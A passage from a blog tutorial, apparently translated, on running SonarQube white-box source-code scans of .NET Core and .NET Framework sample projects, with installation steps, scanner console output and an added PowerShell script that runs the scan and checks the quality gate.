<span style="color: white;">D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5></span><br />
</div>
<hr style="border: 2px solid rgb(174, 214, 241);" />
<p style="margin-bottom: 8px; text-indent: 2em;">If the preceding steps were carried out correctly, the scan should complete and end with "<span style="color: #990000;">EXECUTION SUCCESS</span>". If an error occurs along the way, read the messages carefully and use Google or ChatGPT to find the answer.</p><p style="margin-bottom: 8px; text-indent: 2em;">Once the scan is complete, the project results are visible in the SonarQube Scanner Web UI.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxKXZWG0p6JO9pQYib6ZMz80Xt_FfAh46dyKuTemv9oRqCGATsX1BTEJr_G-HNwW-4TJznnHv5BaV01blmVNtixZgA7toI__xQT3l2DdJ93mMUHIpJ3KIR_umnmV050j1YaSSe4mHxDNJmWTki1HNDxHWSuZ7dnuLu1r0V4Rvbuw9esSAKckVN6PYsb7qk/s1594/011.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="404" data-original-width="1594" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxKXZWG0p6JO9pQYib6ZMz80Xt_FfAh46dyKuTemv9oRqCGATsX1BTEJr_G-HNwW-4TJznnHv5BaV01blmVNtixZgA7toI__xQT3l2DdJ93mMUHIpJ3KIR_umnmV050j1YaSSe4mHxDNJmWTki1HNDxHWSuZ7dnuLu1r0V4Rvbuw9esSAKckVN6PYsb7qk/w640-h162/011.PNG" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div>
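<p style="margin-bottom: 8px; text-indent: 2em;">An added example, not part of the original post or of SonarQube's own material: the begin/build/end sequence above as a PowerShell script that takes the Project Token from an environment variable instead of writing it into the command text, then confirms that the server finished processing the report and reads the quality gate. The variable name SONAR_TOKEN, the helper function names and the report-task.txt location are assumptions; the server URL and project key are the ones used in this post.</p>

```powershell
# Added example, not from the original post. Run it from the project directory.
# Assumed names: SONAR_TOKEN (environment variable) and the helper functions.
$ErrorActionPreference = 'Stop'

$SonarUrl   = 'http://192.168.232.153:9000'   # server address used in the post
$ProjectKey = '.netFramework-Example.core'    # project key used in the post
# Assumed location of the key=value file the scanner's end step writes.
$ReportTask = '.sonarqube\out\.sonar\report-task.txt'

function Read-KeyValueFile {
    param([Parameter(Mandatory)][string]$Path)
    $map = @{}
    foreach ($line in Get-Content -LiteralPath $Path) {
        # Split on the first '=' only: values such as ceTaskUrl contain "?id=...".
        $i = $line.IndexOf('=')
        if ($i -gt 0) {
            $map[$line.Substring(0, $i).Trim()] = $line.Substring($i + 1).Trim()
        }
    }
    return $map
}

function Invoke-Step {
    param([Parameter(Mandatory)][string]$Name,
          [Parameter(Mandatory)][scriptblock]$Action)
    & $Action
    # Stop at the first failing step instead of uploading a partial analysis.
    if ($LASTEXITCODE -ne 0) { throw "$Name failed with exit code $LASTEXITCODE" }
}

function Wait-SonarTask {
    param([Parameter(Mandatory)][string]$TaskUrl,
          [Parameter(Mandatory)][hashtable]$Headers,
          [int]$TimeoutSeconds = 300)
    $deadline = (Get-Date).AddSeconds($TimeoutSeconds)
    while ((Get-Date) -lt $deadline) {
        $task = (Invoke-RestMethod -Uri $TaskUrl -Headers $Headers).task
        switch ($task.status) {
            'SUCCESS'  { return $task }
            'FAILED'   { throw "Server-side processing failed: $($task.errorMessage)" }
            'CANCELED' { throw 'Server-side processing was canceled' }
            default    { Start-Sleep -Seconds 3 }   # PENDING or IN_PROGRESS
        }
    }
    throw "Timed out waiting for $TaskUrl"
}

if ([string]::IsNullOrWhiteSpace($env:SONAR_TOKEN)) {
    throw 'SONAR_TOKEN is not set in this session.'
}
$token = $env:SONAR_TOKEN

# The token is still handed to the scanner as a process argument, but it is no
# longer stored in a .bat file, a saved command line or pasted console output.
Invoke-Step 'begin' { dotnet sonarscanner begin "/k:$ProjectKey" "/d:sonar.host.url=$SonarUrl" "/d:sonar.login=$token" }
Invoke-Step 'build' { dotnet build }
Invoke-Step 'end'   { dotnet sonarscanner end "/d:sonar.login=$token" }

$info = Read-KeyValueFile -Path $ReportTask
if (-not $info.ContainsKey('ceTaskId')) { throw "No ceTaskId found in $ReportTask" }

# A token authenticates as the Basic-auth user name with an empty password.
# The post's server is plain HTTP, so this header is sent unencrypted.
$basic   = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes("${token}:"))
$headers = @{ Authorization = "Basic $basic" }

# Build the task URL from the configured server rather than trusting the URL
# stored in the file, so the token only ever goes to $SonarUrl.
$taskUrl = "$SonarUrl/api/ce/task?id=$([uri]::EscapeDataString($info['ceTaskId']))"
$task    = Wait-SonarTask -TaskUrl $taskUrl -Headers $headers

$gateUrl = "$SonarUrl/api/qualitygates/project_status?analysisId=$($task.analysisId)"
$gate    = (Invoke-RestMethod -Uri $gateUrl -Headers $headers).projectStatus
Write-Host "Report processed; quality gate: $($gate.status)"
if ($gate.status -eq 'ERROR') { exit 1 }
```

<p style="margin-bottom: 8px; text-indent: 2em;">"EXECUTION SUCCESS" in the scanner output means the report was uploaded; the task status check is what confirms that the server processed it.</p>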
<hr style="border: 2px solid rgb(174, 214, 241);" /> For scanning dotNet Framework projects, see: <a href="http://以SonarQube執行.netFramework專案的源碼掃描(白箱掃描)">Source Code Scanning of .netFramework Projects with SonarQube (White-Box Scanning)</a></div>
<p>Author: 雅技資訊技術</p>
<p>Published 2023-09-24T16:17:00.005+08:00, updated 2023-09-26T20:29:32.642+08:00</p>
<p>Source Code Scanning of .netFramework Projects with SonarQube (White-Box Scanning)</p>
<div style="border: 3px solid rgb(17, 122, 101); line-height: 150%; padding: 8px;">
<p style="margin-bottom: 8px; text-indent: 2em;"><a href="https://www.sonarsource.com/products/sonarqube/downloads/?gads_campaign=SQ-Mroi-PMax&gads_ad_group=Global&gads_keyword=&_gl=1*va5gvw*_up*MQ..&gclid=CjwKCAjwmbqoBhAgEiwACIjzEI66FX1-IEadA5PhZD8AlOYcaDmlO2JNog-wx0y8seU7bEGnQSX7NBoCkNAQAvD_BwE" target="_blank">SonarQube</a> is a white-box scanning tool. This example uses the free, open-source Community edition<span style="text-indent: 2em;">; for installation, see "<a href="http://atic-tw.blogspot.com/2023/03/kali-linuxarachnisonarqube.html" target="_blank">Building Black-Box and White-Box Scanning Systems on KALI Linux (Arachni and SonarQube)</a>".</span></p>
<p style="margin-bottom: 8px; text-indent: 2em;">This article uses the sample "<a href="https://github.com/SonarSource/sonar-scanning-examples" target="_blank"><b><span style="color: #bf9000;">sonar-scanning-examples-master</span></b>\<b><span style="color: #990000;">sonarqube-scanner-msbuild</span></b>\<b style="background-color: #fcff01;">CSharpProject</b></a>" provided by SonarQube for the demonstration. To scan another .netFramework project, adjust the steps to that project's environment and structure, especially the tool and SDK versions.</p>
<p style="color: #274e13; margin-bottom: 0px;"><b>I. Prerequisites</b></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px; text-indent: -2em;">(1) <a href="https://docs.sonarqube.org/latest/analysis/scan/sonarscanner-for-msbuild/" target="_blank">SonarScanner for .NET</a> (this example uses sonar-scanner-msbuild-5.11.0.60783-net46.zip)</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(2) MSBuild V14 or later (VS Community 2019 or later; this example uses <a href="https://visualstudio.microsoft.com/zh-hant/vs/community/" target="_blank">VS Community 2022</a>)</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(3) The .Net Framework version the project requires (this example uses the one bundled with VS Community 2022)</p>
<p style="color: #274e13; margin-bottom: 0px;"><b>II. Optional Requirements</b></p>
<p style="margin-bottom: 8px; margin-left: 2em; margin-top: 0px;">Add the directories containing the SonarScanner for .NET executable and MSBuild.EXE to the <b><span style="color: red;">Path</span></b> environment variable. If they are not added, the full path must be given by hand when running the commands.</p>
<p style="color: #274e13; margin-bottom: 0px;"><b>III. Installing the Requirements</b></p>
<p style="margin-bottom: 0px; margin-left: 4em; margin-top: 0px; text-indent: -2em;"><b>(1) Install SonarScanner for .NET:</b></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px;">Extract the downloaded sonar-scanner-msbuild-5.11.0.60783-net46.zip to a directory of choice, for example "C:\sonar-scanner-msbuild-5.11.0.60783-net46"</p>
<p style="margin-bottom: 0px; margin-left: 4em; text-indent: -2em;"><b>(2) Install Visual Studio Community 2022:</b></p>
<p style="margin-bottom: 8px; margin-left: 5em; margin-top: 0px; text-indent: -2em;">1. Download <a href="https://visualstudio.microsoft.com/zh-hant/vs/community/" target="_blank">VisualStudioSetup.exe </a>(the VS Community 2022 installer) and run it.</p>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">2. During installation, additionally select ".NET Framework 4.6.2-4.7.1 development tools" and ".NET Framework 4.8.1 development tools"</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9MqaAnOLxREu3uLG3CGhCbaYAB6HYPIWWKFdUra-FC4dMIifwT2kNuSLZpIvn6i0imgfqddym7miHVkmn0aNDnRuln_wEcHw-TyS3lPZWnghgiPYv4hPX7E9Ty5gYTXBXdojXbQx4FQlkAW9Kd9NWJr3Fxls8gHuoKjIECC1Yka14kXWbLZ_q4CYd5R7o/s1245/vs-community_001.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="713" data-original-width="1245" height="229" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9MqaAnOLxREu3uLG3CGhCbaYAB6HYPIWWKFdUra-FC4dMIifwT2kNuSLZpIvn6i0imgfqddym7miHVkmn0aNDnRuln_wEcHw-TyS3lPZWnghgiPYv4hPX7E9Ty5gYTXBXdojXbQx4FQlkAW9Kd9NWJr3Fxls8gHuoKjIECC1Yka14kXWbLZ_q4CYd5R7o/w400-h229/vs-community_001.PNG" width="400" /></a></div><p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;"></p>
<p style="color: #274e13; margin-bottom: 0px;"><b>IV. Verifying the Environment</b></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px; text-indent: -2em;">(1) Running "C:\sonar-scanner-msbuild-5.11.0.60783-net46\SonarScanner.MSBuild.exe /?" shows the usage help for Sonar-scanner for .net.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZZLOmVNaR5tsT3d_gGoptJmNzxjhS0z1YK8gSCxMyDUYcC7iqWrwRy3R49asHLIP1XuLblim627DidYfYOV81NtO1347SeRoc0P9SMD4psfZ9Ct5hdI1QdMHReBl_VxLhH8BgGqHcrFQLxReyu580UDe5fyCA9obI23qXOYtWwGpCsamQ_aKPZK1XloE-/s1234/sonar_net_001.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="229" data-original-width="1234" height="74" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZZLOmVNaR5tsT3d_gGoptJmNzxjhS0z1YK8gSCxMyDUYcC7iqWrwRy3R49asHLIP1XuLblim627DidYfYOV81NtO1347SeRoc0P9SMD4psfZ9Ct5hdI1QdMHReBl_VxLhH8BgGqHcrFQLxReyu580UDe5fyCA9obI23qXOYtWwGpCsamQ_aKPZK1XloE-/w400-h74/sonar_net_001.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px; text-indent: -2em;"></p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(2) Running ""C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\amd64\msbuild.exe" /version" shows the version of Msbuild.exe.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFtBybyfojo9t6NHwuusI6LlBxOBZyZJ40PXqj6Quep2lI2h6fagCj52lwI1_jMg2vwt3mkLA1UIXWtfrIdBqh5QI3r3hc3wJKXxlkc9fe9Bv6FLCJRmwf4RTKxqqyTibUzUiOHIm13yhX4mvKsuZ-YYhV_egPJsjMebg3EVZ9CTfzOpQRKMYvMakNYXjh/s1235/sonar_net_002.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="153" data-original-width="1235" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFtBybyfojo9t6NHwuusI6LlBxOBZyZJ40PXqj6Quep2lI2h6fagCj52lwI1_jMg2vwt3mkLA1UIXWtfrIdBqh5QI3r3hc3wJKXxlkc9fe9Bv6FLCJRmwf4RTKxqqyTibUzUiOHIm13yhX4mvKsuZ-YYhV_egPJsjMebg3EVZ9CTfzOpQRKMYvMakNYXjh/w400-h50/sonar_net_002.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"></p>
<p style="color: #274e13; margin-bottom: 0px;"><b>V. Running the Scan</b></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px; text-indent: -2em;">(1) Start the SonarQube Scanner Server, assumed here to be at "<span style="color: #cc0000;">http://192.168.232.153:9000</span>"</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(2) Connect to the SonarQube Scanner Server with a browser and create a scan project (when rescanning an existing project, have its Project Token ready)</p>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">1. On the Projects page, choose "Create Project" -> "Manually"</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/s1573/sonar_net_003.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="1573" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/w400-h63/sonar_net_003.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">2. The Community edition only offers "Locally"</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/s647/sonar_net_005.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="647" data-original-width="440" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/w273-h400/sonar_net_005.PNG" width="273" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">3. Fill in "Project display name" and "Project key"</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/s700/sonar_net_004.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="700" data-original-width="549" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/w314-h400/sonar_net_004.PNG" width="314" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">4. Generate the Project Token (the project's identity credential)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/s815/sonar_net_006.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="613" data-original-width="815" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/w400-h301/sonar_net_006.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">5. Make a note of the Project Token</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiudrra5PUPAamjWTSqbZYWPrRqR-AHYgkVJ8bB2YQCIR2F8FmCsP9Eqlhinp0ybu4oDhYofIgT9qv_B2wUfexUS9aWWmKW_J6zSbxDMWNaiY1RbOSsz5LMXpD3mlWj9AvlgueoGViAy2h80LwJBYIaPV7drpGjZfDFAD7WZ4CDriOQZaIjDa83t_uSydcM/s812/sonar_net_007.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="553" data-original-width="812" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiudrra5PUPAamjWTSqbZYWPrRqR-AHYgkVJ8bB2YQCIR2F8FmCsP9Eqlhinp0ybu4oDhYofIgT9qv_B2wUfexUS9aWWmKW_J6zSbxDMWNaiY1RbOSsz5LMXpD3mlWj9AvlgueoGViAy2h80LwJBYIaPV7drpGjZfDFAD7WZ4CDriOQZaIjDa83t_uSydcM/w400-h272/sonar_net_007.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">6. Select the type of project to scan (.NET)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi4oJwac08e5AL_MMBNpKKZ8eUrlR6auvM7OvTLQMJB1mCad_Nw0cJFUz0WK5QzXtNlO5nmj_d3rO3vQl3mp7HCPSLvbCngkFbeHatUmGuaX8Yvavqniy663_wmmkPJQkPt8iyJwJn9KYfmuN0KIvFnC4WiSYQjMvorqS2nsY4GwxTgyj8twFHrHmgFcfk/s630/sonar_net_008.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="531" data-original-width="630" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi4oJwac08e5AL_MMBNpKKZ8eUrlR6auvM7OvTLQMJB1mCad_Nw0cJFUz0WK5QzXtNlO5nmj_d3rO3vQl3mp7HCPSLvbCngkFbeHatUmGuaX8Yvavqniy663_wmmkPJQkPt8iyJwJn9KYfmuN0KIvFnC4WiSYQjMvorqS2nsY4GwxTgyj8twFHrHmgFcfk/w400-h338/sonar_net_008.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">7. Select the .NET flavor (.NET Framework)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOV1DPcOt5GzcNsYc53KD7ESEHk76WzOrgJgHheUyQIExvKiy-guzN-LuYZCxO7Q1NI42zZ9VT2fWkngaU7ALNMBwOiA3haegQ0YSH8_bafTP-JMP-TuJclu0fyFKgVRM6csk9kRDbSeKkRklIHA3IzFM0WV7LP1gV-n-bHKM2t5EkosOv3qTZibjX33F3/s1544/sonar_net_009.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1050" data-original-width="1544" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOV1DPcOt5GzcNsYc53KD7ESEHk76WzOrgJgHheUyQIExvKiy-guzN-LuYZCxO7Q1NI42zZ9VT2fWkngaU7ALNMBwOiA3haegQ0YSH8_bafTP-JMP-TuJclu0fyFKgVRM6csk9kRDbSeKkRklIHA3IzFM0WV7LP1gV-n-bHKM2t5EkosOv3qTZibjX33F3/w400-h272/sonar_net_009.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"><span style="text-indent: -2em;">(3) Copy the three commands that SonarQube provided when the scan project was created, adjust them as needed in a text editor, and save them as "<span style="color: #990000;">Sonar_net-framework-example.bat</span>" in the .netFramework solution directory (the directory that holds the <b><span style="color: red;">.sln</span></b> solution file; in this example C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject)</span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLxaAoF-3lDxTq1LQyPE6kadraMtvii-sk47xb5iWCEcSUQeJsO4zSEAmGF34f6K8IH0CrKRXOcrgvBOB7he13BRTX8nizc-1rEBgwCd4j8K4waVuTmYBAIJANmqoTyPJs9X42S3XrcwAf-5lBmTHIqoHmITlWG4Gyi_FJFEcACUKuIF8A3cGYinb6YtcY/s1468/sonar_net_010.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="473" data-original-width="1468" height="129" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLxaAoF-3lDxTq1LQyPE6kadraMtvii-sk47xb5iWCEcSUQeJsO4zSEAmGF34f6K8IH0CrKRXOcrgvBOB7he13BRTX8nizc-1rEBgwCd4j8K4waVuTmYBAIJANmqoTyPJs9X42S3XrcwAf-5lBmTHIqoHmITlWG4Gyi_FJFEcACUKuIF8A3cGYinb6YtcY/w400-h129/sonar_net_010.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"></p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(4) Open a Command Prompt as administrator and change the working directory to the .NET Framework solution directory.</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(5) Run "Sonar_net-framework-example.bat" directly (the run is shown below).</p><p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"></p>
<div style="background-color: black; border: 1px dashed rgb(211, 84, 0); font-size: 10pt; line-height: 100%; padding: 4px; word-break: break-all;"><span style="color: white;">C:\></span><span style="color: #e69138;">cd C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject</span><br /><span style="color: white;">
C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject></span><span style="color: #e69138;">Sonar_net-framework-example.bat</span><br /><span style="color: white;">
SonarScanner for MSBuild 5.11</span><br /><span style="color: white;">
Using the .NET Framework version of the Scanner for MSBuild</span><br /><span style="color: white;">
Pre-processing started.</span><br /><span style="color: white;">
Preparing working directories...</span><br /><span style="color: white;">
08:56:22.776 Updating build integration targets...</span><br />
<b style="color: white;"><span style="color: #ff00fe;">&lt;&lt;Some messages omitted&gt;&gt;</span></b><br /><br />
<span style="color: #6fa8dc;">SonarWriteProjectData: </span><br />
<span style="color: white;">
Sonar: (SomeConsoleApplicationTest.csproj) Project processed successfully</span><br />
<b style="color: white;"><span style="color: #ff00fe;">&lt;&lt;Some messages omitted&gt;&gt;</span></b><br /><br />
<span style="color: #04ff00;">建置成功。</span><span style="color: #04ff00;"> </span><br />
<span style="color: #fcff01;"><span>"C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject\SomeConsoleApplication.sln" (Rebuild 目標) (1)</span><br />
<span> -></span><br />
<span>"C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject\SomeConsoleApplication\SomeConsoleApplicatio</span><span>n.csproj" (Rebuild 目標) (2) -></span><br />
<span>(CoreCompile 目標) -></span><br /><span> C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject\SomeConsoleApplication\Program.cs(4,18): wa</span><span>rning S1118: Add a 'protected' constructor or the 'static' keyword to the class declaration. (https://rules.sonarsource</span><span>.com/csharp/RSPEC-1118) [C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject\SomeConsoleApplicati</span><span>on\SomeConsoleApplication.csproj]</span><br /><span> C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject\SomeConsoleApplication\Program.cs(21,28): w</span><br />
<span>arning S3400: Remove this method and declare a constant for this value. (https://rules.sonarsource.com/csharp/RSPEC-340</span><span>0) [C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject\SomeConsoleApplication\SomeConsoleApplica</span><span>tion.csproj]</span><br />
<span> C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject\SomeConsoleApplication\Program.cs(9,17): wa</span><span>rning S2583: Change this condition so that it does not always evaluate to 'true'; some subsequent code is never execute</span><span>d. (https://rules.sonarsource.com/csharp/RSPEC-2583) [C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CShar</span><span>pProject\SomeConsoleApplication\SomeConsoleApplication.csproj]</span></span><br />
<span style="color: #fcff01;"><br /></span><br />
<span style="color: #fcff01;"> 3 個警告</span><br /><span style="color: white;">
0 個錯誤</span><br /><span style="color: white;">
經過時間 00:00:20.71</span><br /><span style="color: white;">
SonarScanner for MSBuild 5.11</span><br /><span style="color: white;">
Using the .NET Framework version of the Scanner for MSBuild</span><br /><span style="color: white;">
Post-processing started.</span><br /><span style="color: white;">
Calling the TFS Processor executable...</span><br /><span style="color: white;">
The TFS Processor has finished</span><br /><span style="color: white;">
Calling the SonarScanner CLI...</span><br /><span><b><span style="color: #ff00fe;">
&lt;&lt;Some messages omitted&gt;&gt;</span></b><br /></span><br />
<span style="color: white;">
INFO: ------------------------------------------------------------------------</span><br />
<span style="color: white;">
INFO: <span style="background-color: #6c3483;">EXECUTION SUCCESS</span></span><br />
<span style="color: white;">
INFO: ------------------------------------------------------------------------</span><br /><span style="color: white;">
INFO: Total time: 45.588s</span><br /><span style="color: white;">
INFO: Final Memory: 16M/57M</span><br /><span style="color: white;">
INFO: ------------------------------------------------------------------------</span><br /><span style="background-color: #6c3483; color: white;">
The SonarScanner CLI has finished</span><br /><span style="color: white;">
08:57:43.051 Post-processing succeeded.</span><br /><span style="color: white;">
C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject></span><br /><br />
</div>
<hr style="border: 2px solid rgb(174, 214, 241);" />
<p style="margin-bottom: 8px; text-indent: 2em;">If the preceding steps were carried out correctly, the scan should complete and end with "<span style="color: #990000;">EXECUTION SUCCESS</span>". If an error occurs along the way, read the messages carefully and use Google or ChatGPT to find the answer.</p><p style="margin-bottom: 8px; text-indent: 2em;">Once the scan completes, the project results appear in the SonarQube Scanner Web UI.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPQGjigVWEQeTuo4IusXnxhg7G7oi3yZBAlDR80BYZgSjWSd__iMSZbOdAJ9IHtXPP-iLPTnd8M5knjQIxifBepdKbKtpG2abLiNekfmUZL5FOQA-ucBsOQUH6A1rRm8_HhcFdxaxShFbJreZkC_oIqpt728G80ZoJ2n1uC_yWyoRnm4bdSABHWKR4pMYL/s1567/sonar_net_011.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="410" data-original-width="1567" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPQGjigVWEQeTuo4IusXnxhg7G7oi3yZBAlDR80BYZgSjWSd__iMSZbOdAJ9IHtXPP-iLPTnd8M5knjQIxifBepdKbKtpG2abLiNekfmUZL5FOQA-ucBsOQUH6A1rRm8_HhcFdxaxShFbJreZkC_oIqpt728G80ZoJ2n1uC_yWyoRnm4bdSABHWKR4pMYL/w640-h168/sonar_net_011.PNG" width="640" /></a></div><br /><span style="background-color: #9fc5e8;"> For scanning dotNet Core projects, see: <a href="http://atic-tw.blogspot.com/2023/09/sonarqubedotnet-core.html" target="_blank">Scanning dotNet Core Project Source Code with SonarQube (White-Box Scanning)</a></span></div>
<p>雅技資訊技術 (http://www.blogger.com/profile/06948808120337987647)</p>
